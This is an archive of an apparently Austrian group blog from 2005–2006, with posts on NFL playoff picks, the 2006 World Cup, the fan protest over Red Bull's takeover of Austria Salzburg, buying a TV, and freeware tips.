  12. Audioslave - Be Yourself
  13. Deftones - No Ordinary Love
  14. Razorlight - Somerwhere Else
  15. The Strokes - On The Other Side
ausser konkurrenz: Green Day - Bullet in a Bible (DVD) - definitiv mein highlight des jahres... und DTH @ Burgtheater Unplugged (DVD)
a new year - a new layout  sTe  04.01.2006 15:03:27
das neue feelo ist fast fertig - einige features fehlen noch, und hier und dort gibts noch kleinere bugs...just tell me:
:: NFL PLAYOFFS 2006  bully  03.01.2006 15:52:25
Es ist Jänner und damit auch Zeit für die Playoffs in der NFL.
Nachdem es die Lions heuer wieder nur auf enttäuschende fünf Siege (in 16 Spielen) brachten, war die Playoff-Teilnahme recht schnell kein Thema mehr. Dem Ali mit seinen Käseköpfen ging´s aber GsD auch nicht besser ;))

Hier nun mal zur Erläuterung die Setzlisten der beiden Conferences für die Postseason:

AFC
1. Indianapolis Colts
2. Denver Broncos
3. Cincinnati Bengals
4. New England Patriots
5. Jacksonville Jaguars
6. Pittsburgh Steelers

NFC:
1. Seattle Seahawks
2. Chicago Bears
3. Tampa Bay Buccaneers
4. New York Giants
5. Carolina Panthers
6. Washington Redskins

Die ersten beiden Teams pro Conference haben dieses Wochenende spielfrei; daraus ergeben sich fürs Wildcard Weekend folgende Begegnungen:

Sa., 07.01.06:
22:30 Uhr: Washington @ Tampa Bay (NFC) 17-10
02:00 Uhr: Jacksonville @ New England (AFC) 3-28

So., 08.01.06:
19:00 Uhr: Carolina @ NY Giants (NFC) 23-0
22:30 Uhr: Pittsburgh @ Cincinnati (AFC) 31-17

Wer also von diesen 8 Teams schafft es in die Divisional Playoffs und damit einen Schritt weiter in Richtung Superbowl XL, die heuer am 05.02. im Ford Field zu Detroit stattfindet?
Die Redskins haben einen Lauf und können durchaus auch in Tampa gewinnen; den Jaguars ist es in New England im Jänner einfach zu kalt, klarer Sieg für den Titelverteidiger. Der Sonntag ist für mich sehr schwer zu prognostizieren, alles ist möglich. Mein Tipp: Panthers und Bengals

Am 14. und 15.01. treffen dann jeweils die beiden Topgesetzten pro Conference auf die Sieger des kommenden Wochenendes; Seattle und Indy jeweils auf den niedriger gesetzten in der obigen Liste…

-------------------------

Wow, 3 Auswärtssiege also in den Wildcard Games, auch keine Alltäglichkeit... (und 3 richtige Tipps meinerseits ;), danke stevie ;) )

Daraus ergeben sich also für die Divisional Playoffs folgende Partien:

Sa., 14.01.06:
22:30 Uhr: Washington @ Seattle (NFC) 10-20
01:00 Uhr: New England @ Denver (AFC) 13-27

So., 15.01.06:
19:00 Uhr: Pittsburgh @ Indianapolis (AFC) 21-18
22:30 Uhr: Carolina @ Chicago (NFC) 29-21

Seattle ist für die Redskins eindeutig zu stark, Sieg Seahawks; Patriots gegen die Broncos wird wohl der Schlager der Runde; die Broncos sind wiedererstarkt, aber die Patriots haben immerhin die letzten 10 Playoff-Spiele alle gewonnen und könnten sich heuer den vierten Titel der letzten fünf Jahre holen; schwer zu sagen, aber Sieg New England; der Sonntag sollte den Heimteams gehören, die Colts sind reif für den Titel und sollten daher auch die Steelers in die Off-Season schicken; die Defense der Bears ist fast unüberwindbar, ausserdem spielt in Chicago auch das Wetter eine Rolle, den Burschen aus Raleigh, North Carolina wird der Wind um die Ohren blasen und sie werden sich wohl für heuer verabschieden...

-------------------------

Na bumm, was war denn das, bitte…?
Die Seahawks besiegen die Redskins mit einer äusserst dürftigen Leistung; drei Fumbles und ohne einen schon nach wenigen Minuten verletzten Shaun Alexander, immerhin aktueller MVP der Liga. Aber das war echt keine Glanzleistung, mehr rübergeschwindelt, aber bitte. Die Broncos gewinnen verdient gegen die Patriots, der Titelverteidiger streicht zu Recht die Segel, was nicht unbedingt zu erwatren war. Die wahren Überraschungen bot allerdings der Sonntag; in einer nicht immer hochklassigen aber extrem spannenden Partie besiegten die von mir nicht gerade geliebten Steelers den Topfavoriten aus Indianapolis. Es scheint wohl als hätte den Colts das lange Schonen der Topstars inkl. Pause letzte Woche nicht gutgetan; eigentlich keiner konnte seine Form der Reagular Season konservieren; die Colts haben hier immerhin die ersten 13 Spiele in Folge gewonnen und es dann etwas ruhiger angehen lassen; naja, selber schuld; wer zu Hause gegen die Steelers verliert, hat es dann auch nicht verdient. Kompliment aber an Bill Cowher; der Gameplan der Steelers war perfekt! Im letzten Spiel schieden dann auch noch die Bears gegen die extrem diszipliniert und trocken spielenden Panthers aus – schade. Die beste Defense der Liga kassierte im eigenen Stadion 29 Punkte, wer darauf gewettet hat, kassiert bestimmt einiges...

Die Championship Games am kommenden Sonntag (22.01.06) lauten nun:

21:00 Uhr: AFC: Pittsburgh @ Denver 34 - 17
00:30 Uhr: NFC: Carolina @ Seattle 14 - 34

Zum ersten Mal überhaupt steht ein an 6 gesetztes Team (Steelers) im Championship Game; auch die #5-Panthers waren hier nicht wirklich erwartet worden... und die Broncos haben am Samstag den ersten Playoff-Sieg seit Gewinn der Superbowl XXXIII gefeiert. Einzig die Seahawks wurden hier erwartet, diese haben aber an diesem Wochenende sicher die schwächste Vorstellung aller verbliebenen Teams abgeliefert.
Eine Prognose wird schwierig...

PROGNOSE:
ok, ich lehn mich jetzt einfach mal etwas aus dem fenster;
zwei auswärtssiege (riskanter tipp, ich weiss)
aber ich trau´s den steelers einfach zu auch in denver zu gewinnen, und wenn die panthers in seatlle so aufspielen wie in chicago wirds auch für die seahawks sehr sehr schwer.

more to come…
...and a great 2006 !!!!     02.01.2006 02:49:53
merry xmas  sTe  23.12.2005 01:29:36

feelo wuenscht allen ein frohes fest!!! (und nichts falsches denken..., bei uns kommt eh das christkind und nicht der wm)
blitzstart  sTe  18.12.2005 07:12:07
zurueck aus linz - leider?!? nichts ausser hotel und event location (design center) gesehen.
insofern kann ich den "arsch der welt" nicht beurteielen.
stressig wars, keine frage, aber das lob vom auftraggeber lindert :)
wirklich aergerlich war, dass wir keine zeit hatten dem einen gig am tag vor unserer veranstaltung in der hotelbar beizuwohnen: original waterloo & robinson - ich fand sie nur noch weit nach mitternacht an der bar lehnend...
State of the Art Home Entertainment System  romario11  11.12.2005 17:14:34
Nachdem es jetzt langsam ernst wird in Sachen WM macht man sich wie (zumindest) alle vier Jahre wieder einmal Gedanken über den Zustand seines State of the Art Home Entertainment Systems (Copyright "One Night at McCools") und ob dieses dem Gewicht des Ereignisses noch gewachsen ist.

Die Hauptfrage, die sich in diesem Kontext stellt ist: LCD oder Plasma anschaffen oder noch einige Zeit beim alten 70 Kilo schweren Kasten mit einem halben Meter Tiefe bleiben. Derzeit ist das alles ja neben der Preisfrage auch zusätzlich erschwert durch technische Kinkerlitzchen wie HD-Ready usw. Für technisch weniger bewanderte Zeitgenossen wie mich ist das kaum durchschaubar. Wer hat eine Meinung dazu, ob es das Wert ist, dass man derzeit etwa EUR 3000 bis 4000 in ein Mittelklasse LCD Trumm investiert, das dafür aus vertrauenswürdigen Häusern wie Samsung, Sony oder Sharp stammt, oder ob man auch eine Klasse billiger fahren könnte (bei der Anschaffung eines Geräts von mir unbekannten Herstellern wie Videoseven, Tatung oder Viewsonic)?

Außerdem: Ist es wirklich auf mittelfristige Zeit notwendig, dass das Fernsehkastl HD-Ready ist?

Und: Da es auch HD-Ready Plasma Kisten gibt, die bei viel mehr Größe viel weniger kosten - ist das wirklich schon nicht empfehlenswerte Old School oder sehr wohl echte Alternative zu LCD?

Schließlich: Wann soll man zuschlagen? Nach Weihnachten und auf den üblichen Preisnachlass nach der großen Nachfrage hoffen oder überhaupt noch zuwarten, weil die Preise für LCD Kastln generell fallen? Das ist aber dann wahrscheinlich wieder ähnlich wie bei den PCs - alle Preise fallen immer, da kann man ewig zuwarten.

Was meint die Feelogemeinde?
feelo?  sTe  08.12.2005 02:54:00
also uns gibts laenger und auch sonst hab ich mit denen nix am hut; beachtlich jedoch die preise und mutig der spruch: "wir sind zu 99,9% immer erreichbar..." - wer traut sich das in oesterreich (so tiefzustapeln :) )?!? - egal ob fest-, mobil- oder inetprovider
Bravo  sTe  08.12.2005 02:36:18
gaenzlich ohne computer animationen kommt die Sony Bravia werbung aus.
250,000 gummibaelle oder "flumis" (zitat: tochter), werden ueber einen klassischen strassenzug in San Francisco gepfeffert!
eine phantastische idee untermalt mit einem chilligen sound - das gefaellt!

UPDATE: irgendwie erinnert mich das an ein Nada Surf album...
friday game 2  sTe  25.11.2005 18:43:55
wollt ich schon immer haben, den original competion pro aus den 80er. gibts jetzt beim cosmos um 9,90.(mit usb anschluss!)

bereits mit c64 emulator (decathlon, winter games, exploding fist...etc) und mame getestet - rocks !!!
friday game  sTe  25.11.2005 15:27:51
Game: Parking Perfection 2
ski challenge 2006  sTe  24.11.2005 20:43:47

der orf.on startet die skichallenge 2006 heuer gemeinsam mit dem schweizer fernsehen und dem bayrischen rundfunk. das heisst man kann jdz gegen die erzrivalen fahren.
das game gibts ab dem 27.11. gratis zum downloaden unter: skichallenge.orf.at
video  sTe  21.11.2005 20:49:01
eventuell gibts bald eine video section...
the first one
nur zu besuch  sTe  19.11.2005 03:36:35
Nur zu Besuch
TAKE IT OR MISS IT!!!
Supercross Madness !!!  romario11  21.11.2005 01:02:35


Haben heute das Geburtstagsgeschenk der Herren Hons, Steve und Bully eingelöst und sind in die Stadthalle zum Supercross gepilgert. Eigentlich war das unser erstes Mal bei einem Motorsportevent. War sehr genial - was die Burschen da auf ihren Bikes aufgeführt haben war Wahnsinn und verdient riesen Respekt. Und sche laut wars a!

Thanx Guys!!!! Die Sitzplätze waren auch fantastisch!

Leider haben auch am zweiten Tag die Local Heroes ausgelassen und das Finale ging ohne organische österreichische Beteiligung über die Bühne. Zumindest hats ein Schweizer auf KTM auf Platz Zwei geschafft. Trotz eines überragenden Jeff Alessi (USA, 15 !!! Jahre alt - stürzte im Finale) ging der Sieg an die Erfahrung: der Älteste im Feld, Colin Dugmore (37, RSA) machte verdient das Rennen.

Mehr Pics gibts auf feelophoto.

Freuen uns schon auf die Night of the Jumps im Februar!
:: HAPPY BIRTHDAY, MAUSI  bully  17.11.2005 15:33:09
Heute vor 35 Jahren ließ Douglas Engelbart (80) die erste Computermaus patentieren, das Original hält er im Bild rechts in Händen.

Wer mehr wissen will:
Wikipedia
Heise
Wissenschaft-Online

Zusätzliche HAPPY BITHDAY!!!s gehen heute natürlich an Susanna und Uti, alles Gute!!! ;)
welcome luis  sTe  11.11.2005 03:39:14
d o r i s & h a n n e s _ p r o u d l y _
a n n o u n c e _ " L U I S ! ! ! "

a l l _ t h r e e _ o f _ t h e m _ a r e _ i n _ b e s t _ c o n d i t i o n ! ! !

CONGRATULATIONS !!! more to come...
fiiisch  sTe  11.11.2005 01:35:54

inwiefern die fiiisch wirklich lebendig sind kann ich nicht beurteilen - bin ca 3km hinter dem kobel hergefahren, aber was der (mit den roten pfeilen markiert) an wasser verloren hat macht mich doch eher unglaeubig...
time to say goodbye  sTe  10.11.2005 15:37:42
Good bye Stadion Lehen“ ! Gemeinsam mit der Wohnbaugenossenschaft „Die Salzburg“ lädt die Stadt Salzburg am Sonntag, 20. November, zu einem großen Abschiedsfest ins Stadion Lehen ein, mit dessen Abriss in Kürze begonnen wird. „Das Stadion hat 30 Jahre lang eine wichtige Rolle in Salzburg weit über Lehen hinaus gespielt“, meint Bürgermeister Heinz Schaden, „jetzt gebührt ihm auch ein würdiger Abschied“. Eingeladen zu dem Gratis-Fest ist jedermann: AnrainerInnen, Violette, Fußball-Freunde, Familien, Kinder erwartet ein buntes Programm, das von der Vorstellung des Dream-Teams 1994 bis zum Brillantfeuerwerk reicht.
dazu ein nettes amateur video :)
DANKE fuer die wunderbare zeit!!!
projects...  sTe  01.11.2005 14:25:29
2 neue websites seit heute online:
Elektroaltgeräte Koordinierungsstelle Austria und das Art for Art House.
JCI   sTe  28.10.2005 23:19:28


live from the JCI World Congress 2005 @ austria center...
sterbender schwan  sTe  26.10.2005 06:07:47
der tote schwan im Neusiedler See war vermutlich "altersschwach" - lautet die beruhigende nachricht des tages.
nach den bilateral bedenklichen quärelen zwischen Österreich und Ungarn rund um die herkunft des vogels kann also nun entwarnung gegeben werden...

mein lieber schwan....bleibt die hoffnung, dass die Vogelgrippe (Influenza A H5N1) hauptsaechlich über die medien uebertragen wird...
:: Gerüchte oder mehr???  bully  15.10.2005 19:31:39
Nach brasilianischen Medienberichten vom Freitag gebe es bereits eine Vereinbarung, wonach der fünffache Weltmeister als Kopf der Gruppe F gesetzt wird.
zitat orf.on

da wir ja karten für SIEGER F gegen ZWEITER E haben, ist das wohl keine ganz unwichtige meldung für uns :))))

die auslosung findet am 9. dezember statt!

und die vorfreude wächst und wächst und wächst...


Zusatz:
Nur mal so zur allgemeinen Vorfreudesteigerung; folgende Teams sind bereits fix für die WM 06 qualifiziert:

EUROPA:
Deutschland
Ukraine
Holland
Polen
England
Kroatien
Italien
Portugal
Schweden
Serbien und Montenegro
Frankreich

SÜDAMERIKA:
Argentinien
Brasilien
Ecuador
Paraguay

NORD- UND MITTELAMERIKA:
USA
Mexiko
Costa Rica

AFRIKA:
Angola
Elfenbeinküste
Togo
Ghana
Tunesien

ASIEN:
Japan
Iran
Südkorea
Saudi Arabien

Barrage-Spiele:
Spanien - Slowakei
Schweiz - Türkei
Norwegen – Tschechien
Uruguay - Australien
Trinidad und Tobago - Bahrein
windows  sTe  15.10.2005 05:24:31
Bill Gates on Windows Past, Present, and Future &
Twenty Years of Windows
trophy  sTe  15.10.2005 04:59:50
nerd  sTe  11.10.2005 21:11:07
wenn  babsi  10.10.2005 21:04:08
schlechte träume wahr werden...
weird stuff  sTe  06.10.2005 23:57:28
Snake bursts after gobbling gator - hungry?
RazorBa - shaves your back
BOOOOAAAAAAAHHHHHHHHH !!!!  romario11  06.10.2005 04:59:03
http://www.beertender.at/

Vielleicht gibts des ja auch schon bald mim richtigen Bier? Naja, Zipfer is a ned so schlecht... :))
:: STIEGL-MANIA  bully  04.10.2005 18:18:16


am 10. Oktober ist es so weit!!!


STIEGL-MANIA is coming!!!


go-between  sTe  01.10.2005 07:01:28
schon interessant durch welche banalitaeten man manchmal auf sein alter aufmerksam gemacht wird:
nein es sind nicht die falten, die gewichtszunahme, etc., we have to deal with this every fuckin´ morning!
es sind auch nicht die augenscheinlichen zwischenmennschlichen begegnungen wo man von vermeintlich gleichgesonnenen als "SIE" angesprochen wird;

es reicht manchmal schon eine schnöde werbung mit einem grenzgenialen song: "Finding You" von den Go-Betweens;
wenn man mit 17 jahren "16 Lovers Lane" für sich entdeckt, und eines tages, 17 jahre später, durch den A1 spot durchgeruettelt wird! und das ist der schmerzhafte punkt: EINE WERBUNG WARS die dich erinnert hat!
footballito  sTe  29.09.2005 23:00:24
wuzzelzurnier @ rabcat;
pretty good performance...indeed
in retrospect  sTe  27.09.2005 20:26:50


after one year with the seasonal design, this one will be the last in this sequel.
the next one will be a major upgrade...
forza minardi  sTe  26.09.2005 18:20:40
wird zwar wieder nichts helfen - aber bitte der vollstaendigkeithalber:
minardi pedition
herbst kick off  sTe  26.09.2005 15:29:00

TIP: Erholungsgebiet Steinhof
schoenen dank und auf nimmer wiedersehen..  sTe  19.09.2005 03:17:25
nach dem heutigen ach so grandiosen sieg gegen einen wenig engagierten FAK, begrabe ich nun endgueltig meine hoffnungen, und erklaere meine momentane fussball-verein-fan-unzugehoerigkeit!
schade um den symphathiewert, den sich dieser verein durch ehrlichen fussball erarbeitet hat (mal ganz abgesehen davon was meine wurzeln betreffen) - die eh schon fanszene marode liga hat einen big player verloren; schade mitansehen zu muessen wie ein spieler wie LINKE in diesem SCHEISS verein ein fieses foul begeht wie ich es von MEINER austria nicht einmal in fast 20 jahren erleben musste.
und ganz toll der neue schlachtruf der lemminge: "RED BULL, RED BULL.." : wenn man mir nur einen fussballverein nennen kann wo auch ausschliesslich der sponsor angefeuert wird, dann bitte mich zu korrigieren,...;
GRATULIERE !!!
ihr habt euch ins abseits gespielt, und wie auch noch...

PS: vertroestlich stimmt mich lediglich die salzburg-externe symphatiewelle (photos aus spanien und italien folgen...):

UPDATE: gettin´ really aggressive to comments: sbg.orf
UPDATE 2 :
http://www.directupload.net/show/d/460/v8xK9y7K.jpg
http://www.directupload.net/show/d/460/v37N3XcF.jpg
http://www.directupload.net/show/d/460/w7A4j86L.jpg
blogsearch  sTe  15.09.2005 00:23:34
feelo @ googleblog zwar nicht ganz aktuell, aber bitte...
:: WHO KNOWS?  bully  08.09.2005 18:27:46
In Anbetracht der Katrina wohl nur eine Randbemerkung, aber heute startet die neue NFL-Saison mit der Begegnung Oakland @ New England.

Interessant zu bemerken ist allerdings, dass die NFL schon recht genau zu wissen scheint, wie lange die Aufräumungsarbeiten dauern werden. Houston wird sein erstes Heimspiel bereits am 18.September bestreiten; New Orleans startet logischerweise mit einigen Auswärtsspielen. Das erste Heimspiel wird dann am 16. Oktober stattfinden. Kommt mir persönlich ja schon etwas früh vor…
Ein Bild sagt mehr als 100 Spielberichte...  romario11  08.09.2005 05:42:46
Aserbaidschan 0 - Österreich 0
high definition  sTe  06.09.2005 16:56:40
HDTV - der nächste tv standard wird auch bei uns frueher oder spaeter PAL abloesen, das ist klar. mit einer bis zu 5x hoeheren aufloesung wird geworben.
das das so nicht ganz stimmt ist hier nachzulesen.
und auch der strategische kopierschutz ist schon ausgehebelt mit diesem kleinen kaestchen. (mit dem auch die dz ueber 1000€ anschaffung eines HDTV fernsehers etwas guenstiger kommt).
bleibt die frage inwiefern der meiste schrott im fernsehen ueberhaupt 1920 x 1080 Linien benötigt...
New Orleans  sTe  03.09.2005 01:20:38
"I see it on my big color television screen but I do not believe it.

A city as proud and historic and culturally rich as any city anywhere lies underwater like some premonition of the way the world ends.

On the elevated dry bits, police cars and big mostly empty military trucks drive right past the dying as the wives and husbands of the dying shriek for help.

As the TV cameras pitilessly record the chaos and carnage, I think, this must be some poor African country I’m seeing. Some tragic flood brought on by inept dam builders in a corrupt regime.

Now army tanks roll down the streets, as they did here in New York on September 11th. But the soldiers aren’t in New Orleans to protect the city from foreign terrorists; it’s local looters they’re after." (Jeffrey Zeldman.)

AND THIS DUMB TEXAN JERK FAILS COMPETENCE ONCE AGAIN !!!
SHAME ON YOU !!!
:: JUDGEMENT DAY  bully  25.08.2005 18:52:18

Initiative Violett-Weiß

bin wirklich schon sehr gespannt, was heute herauskommt...
schaumma mal...

ERGÄNZUNG:

Zitat IVW:
Beim dritten Gespräch mit Red Bull Salzburg am 25.8. gab es wiederum noch kein endgültiges Ergebnis. Für 15.9. wurde ein abschließendes Gespräch zur Dressenfrage festgelegt.

Der Dressenvorschlag von Red Bull hat sich ebenso wie die Einstellung der Initiative Violett-Weiß dazu gegenüber dem letzten Gespräch nicht geändert. Die Initiative Violett-Weiß wird von ihren 5 formulierten Punkten nicht abweichen.

Die Initiative Violett-Weiß ersucht alle Violetten Fans, bis zum Aktionswochenende der Linie der Initiative weiterhin zu folgen. Morgen folgen genauere Informationen zum gestrigen Gespräch sowie die Support-Linie für das Heimspiel gegen Admira Wacker. Auch in diesem Zusammenhang, ersuchen wir alle Violetten Fans noch einmal beim Heimspiel gegen die Admira der vorgegebenen Support-Linie zu folgen und sich nicht provozieren zu lassen!
Vielen Dank!


zwei der fünf punkte sind nun bereits von RBS erfüllt; danke IVW!!!! sehr gute arbeit!!! ;))

three remaining...
can  sTe  19.08.2005 17:43:57
nach den 2 wirklich doch eher ugly postings, mal was schoenes fuers auge: the new heineken can;
frei nach dem motto: wenn ich gross bin, möchte ich ein fass sein.
:: SUMMER OF SAM  bully  19.08.2005 17:05:02


Zum dritten Mal in Folge wurde Sam gerade zum hässlichsten Hund der Welt gewählt...

mich wundert´s nicht ;)

Mehr Fotos gibt´s HIER

Cologne  sTe  19.08.2005 04:31:33
der standard titelt:"Stürmischer Empfang für den Papst"
wir fragen:"oder doch Ku Klux Klan" :)
just look @ the eyes
mini project  sTe  18.08.2005 22:43:03
next website online: Blue Danube Media; yet its small, indeed, but it´ll grow!
20q - artificial intelligence  sTe  18.08.2005 15:20:09
pretty nice and almost 100% right; and it keeps learning: http://y.20q.net
maximize it  sTe  17.08.2005 18:29:54

mit maxivista wird jeder laptop zu einem weiterten anzeigegeraet auf das der desktop ausgedehnt werden kann (extended desktop mode).
praktisch auch der remote control mode, mit dem man bis zu 4 computer fernsteuern kann.
und das alles funktioniert lediglich uebers netzwerk.
thats worth a cool tool award!!!
freeware feelopicks  sTe  17.08.2005 03:30:28
  • IrfanView - Bildbetrachtung und (Batch)-Konvertierung (fuer einsteiger ganz nuetzlich: tutorials)
  • TV-Browser - Aktuelles Fernsehprogramm mit vielen nuetzlichen Plugins
  • MediaPlayerClassic - Schlankester Video Player den wo gibt
  • VirtualDub - Video Recording/Editieren/Konvertieren
  • Miranda - Kleinster Multi-Protokoll-Instant Messenger (ICQ,MSN,Yahoo,IRC...)
  • Picasa 2 - Phantastische Photo Gallery/Verwaltung
  • Firefox - Best Browser so far...
more appreciated...(PC or MAC only...)
"Komplexe juristische Situation"  romario11  09.08.2005 14:43:18
Laut ORF Bericht von heute steht ein möglicher Einsatz von Hofmann in unserem Nationalteam in den Sternen.

Man spricht von "komplexen juristischen Hürden". Nach Artikel 15 der Ausführungsbestimmungen zu den geltenden FIFA Statuten ist ein Nationenwechsel für Spieler nur bis zum 21. Lebensjahr möglich, und auch nur dann, wenn der betreffende Spieler noch kein A-Länderspiel für eine andere Nation im Rahmen eines offiziellen Wettbewerbs bestritten hat. Es handelt sich bei dieser Bestimmung bereits um eine Ausnahmebestimmung (eine Ausnahme von der Ausnahmebestimmung ist daher nicht sehr wahrscheinlich). Spieler, die älter sind als 21, konnten den Verband innerhalb eines Jahres nach in Kraft treten der aktuellen FIFA Statuten wechseln (Artikel 15, Absatz 5). Das nennt man Übergangsbestimmung. Artikel 15 Abs 1 wurde zuletzt 2004 ergänzt und trat im Juli 2004 in Kraft. Das Wechselrecht für über 21-Jährige ist daher jedenfalls schon endgültig erloschen. Und zwar völlig unabhängig davon, ob Hofmann das eine oder andere Jugendturnier für Deutschland gespielt hat oder nicht (die gelten ohnedies nicht als A-Länderspiele).

Was an der Situation juristisch komplex sein soll, muss mir noch jemand erklären. Hofmann wird also nur dann für uns spielen können, wenn uns die FIFA entgegen ihren eigenen Statuten eine Extrawurscht braten würde. Was ja nicht untypisch für unsere Nation ist.

Folgt uns die FIFA nicht, dann sind wir alle sehr beleidigt und sagen die EM ab. In Wahrheit war man nur (wieder einmal) nicht fähig, die primitivste Hintergrundrecherche zu machen, bevor man von einer Verstärkung für unseren Nationalkader faselt.

Die Frage, die sich mir in diesem Zusammenhang stellt ist: Wenn Hofmann wahrscheinlich nicht fürs Team spielen kann, auf welcher Grundlage kriegt er dann die österreichische Staatsbürgerschaft? Derzeit hat er darauf nämlich noch keinen Anspruch - er kann sie jetzt nur ausnahmsweise bekommen. Das erforderte allerdings ein "öffentliches Interesse". Wenn er nicht für Ö spielen kann, sehe ich das nicht...
current work  sTe  05.08.2005 01:47:04
  • Servicezentrum ÖGS.barrierefrei - mit der innovation: videotext.web (kurz: synchronisation zwischen gebaerdensprache und textbloecken) - die inhalte werden grossteils erst eingepflegt. auf jedenfall ist die site 100% barrierefrei nach WAI und bizeps approved.
  • ucm-verlag - family business indeed!
shine a light  sTe  04.08.2005 04:27:14
ihr werdet ewig einen platz in unseren herzen haben;
eure froehlichkeit und unbekuemmertheit wird uns fuer immer unvergessen bleiben!
we miss you - but death is not the end - and thats what i believe in!!!
Random Photo  romario11  04.08.2005 05:18:12
Das ist ein nettes tool. Allerdings werden manchmal dabei Schätze ausgegraben, die man eher für ewig vor der Öffentlichkeit verborgen wissen würde. So passiert heute, als da plötzlich die "koatln" an der Reihe war. Da sind ein paar besonders schöne exemplare der üblichen verdächtigen dabei. eines der schönsten fotos war koartln200802. Da kann man nur sagen: Bully, es hat sich alles doch noch zum guten gewendet. Danke Franca und Livia! ;))
Chaos spreads - movin I  romario11  25.07.2005 14:35:20
Chaos spread as we started moving into our new flat. Thanks god it is located just one floor above our current one. But who thinks that moving out would be a piece of cake - WRONG!!!

The good thing is: finally we discovered what these strange little cars are for they sell for 1 EUR in any supermarket... Extremely helpful device! But we will bring it back once we are done.
menu  sTe  21.07.2005 20:17:38
neulich beim wirtn ums eck...
orthographisch aeusserst kreativ :)

nebenbei sei bemerkt, dass das menu (es handelt sich hierbei um eine pizzeria) taktisch nicht ganz so clever gewaehlt ist, in anbetracht des angrenzenden, sehr gut besuchten schnitzlhauses.
Unfassbar blöd  romario11  21.07.2005 04:14:32
Der Jara wirds nicht müde, die Fans öffentlich anzumotzen. Nach dem Spiel heute wieder einmal auf das Vereinsfarbenproblem angesprochen, sagte er im Premiere Interview erneut: "Die Zuschauer müssen froh sein, wenn sie bei solchen Events dabei sein dürfen."

Was glaubt dieser arrogante A***** eigentlich? Jara raus!
...Innen  sTe  20.07.2005 21:37:04
unfassbar bescheuert:
http://ooe.orf.at/stories/46613/
auch nicht viel besser:
http://wien.orf.at/stories/46669/
:: OUR NEW FRIDGE ;)  bully  19.07.2005 17:31:14

Der Siemens KG34UM90

AUSSENANSICHT

INNENANSICHT

*freu*
:: BUNDESLIGA 05/06  bully  12.07.2005 19:34:26

Heute um 19.30 Uhr startet die Österreichische Fussball Bundesliga in ihre neue Saison.

Ich weiss nicht so recht, wie´s mir dabei geht, ich lass jetzt einfach mal alles auf mich zukommen; aber es wird auf jeden Fall eine spannende Saison ...

Einen interessanten Artikel der Neuen Zürcher Zeitung gibt´s HIER.
acronyms that might be unknown...  sTe  10.07.2005 02:18:14
  • BASIC Beginner´s All Purpose Symbolic Instruction Code
  • BETA Begin Experimental Testing Activities
  • GAU Größter Anzunehmender Unfall
  • IKEA Ingvar Kamprad, Elmtaryd, Agunnaryd (Der Name des Firmengründers, sein heimatlicher Hof und der Heimatort)
  • Jeep General Purpose (Car)
  • Karaoke karappo (leer) - okesutura (Orchester), also "leeres Orchester"
  • Milka Milch und Kakao
  • de SPAR Door Eendrachtig Samenwerken Profiteren Allen Regelmatig (Durch einträchtiges Zusammenwirken profitieren alle regelmäßig)
  • TWAIN Tool Without Any Interresting Name
  • Vodafone Voice Data Fone
  • Yahoo Yet Another Hierarchical Officious Oracle

to be continued...
london burning  sTe  07.07.2005 18:31:32
@ (7.7.2005 ?!?) HORROR!!!
zen & zero  sTe  01.07.2005 17:03:14
der plan wurde von vielen belaechelt - das ergebnis beeindruckt: surfextravaganza
gratulation an die crew !!!!
ps: check out the movie trailer
skydive  sTe  01.07.2005 16:28:02
latest work: the Opel Zafira Flexibility Game; leider in einem popup...
initiative violett-weiss  rriot  01.07.2005 14:33:18
aus einem traum wurde ein albtraum. die übernahme unserer salzburger austria durch red bull entwicklet sich langsam aber sicher zur langsamen auslöschung des 1933 gegründeten traditionsvereins. alles was an die bewegte geschichte der austria erinnert wird von den neuen eigentümern ausgeblendet. die farben wurden uns gestohlen. beim test gegen hadjuk split wurde sogar fans in violett-weiss der zutritt mit fahnen und transparenten verwehrt.
nach 28 jahren kann ich nicht einfach tatenlos zusehen. deshalb habe ich die initiative violett-weiss mitgegründet.
diese vereint fanclubs und nicht organisierte fans unter einem gemeinsamen dach mit dem ziel kreativ und (weitgehend) friedlich dafür zu kämpfen, dass wir zumindest violett-weisse heimdressen zurückbekommen.
wir werden regelmässig presseaussendungen machen, nächste woche werden 10.000 flyer gedruckt, ein eigenes, hochwertiges polo-shirt ist in auftrag gegeben. jeder dem unsere austria am herzen liegt ist herzlich eingeladen mitzuarbeiten.
STOP THE BULLSHIT!
copy that  sTe  29.06.2005 02:03:11
indeed!´s newest investment: Primera Disc Publisher Pro
wer immer auch ab jetzt eine groessere stueckzahl, sag ma mal >50 stueck, an cd´s mit custom label druck benoetigt, just mail me. (legal stuff only!!!)
der roboter ist echt geil :)
no - niet - non - nein  sTe  26.06.2005 21:03:26
Das einheimische "Nein" kann in nahezu beliebiger Anzahl von Buchstaben und Worten zum Ausdruck gebracht werden. Hier ein paar Prototypen.
  • JA. Das riskante Nein des scheinbaren Widerspruchs. Beliebt bei Kindern. (Fragender: "Hast du die Hausaufgaben schon gemacht?" Antwortender: "Ja.")
  • JAAA. Das ungeduldige Nein mit zeitaufschiebender Wirkung.
  • JA GLEICH. Das "Nicht gleich, sondern jetzt!" einfordernde Nein mit zeitaufschiebender Wirkung.
  • SPÄTER. Das geduldige Nein mit zeitaufschiebender Wirkung.
  • JA, KÖNNEN WIR EINMAL MACHEN. Das den Willen zum Ja andeutende Nein mit großzügigem Vertröstungsfaktor. (Wird zumeist verwendet, um ein Treffen zu verhindern.)
  • JA, DA RUFEN WIR UNS Z´SAMM. Das den Willen zum Ja andeutende Nein mit zeitlich begrenztem Vertröstungsfaktor. (Wird zumeist verwendet, um eine neuerliche Begegnung zu vermeiden.
  • PRINZIPIELL GERNE. Klares Nein mit belohnend befürwortender Geste gegenüber demjenigen, der tapfer angefragt hat.
  • AN SICH JA. An und für sich, aber - nein.
  • ICH WERD´S VERSUCHEN . Klares Nein mit vorgetäuschter Bemühung, das Ungewollte doch noch möglich zu machen.
  • ICH SCHAU, DASS ES SICH AUSGEHT. Brutales Nein mit durchschaubarer Bemühung, dass es sich nicht ausgeht.
  • ICH SCHAU, DASS ICH SPÄTER NACHKOMME. Wenn irgendwer ganz bestimmt nicht kommt, dann dieser hier.
  • ICH HAB´S IM HINTERKOPF GESPEICHERT. Und ebendort wird es in Bruchteilen von Sekunden gelöscht.
  • TRAG MICH EINMAL MIT FRAGEZEICHEN EIN. Sehr charmante, moderne Form der terminkalendarischen oder notebookmäßigen klaren Absage.
  • NEIN. Nein. Antiquiert. Wird nur selten verwendet.
(c) der standard 25.06.05
back again  sTe  26.06.2005 18:10:26
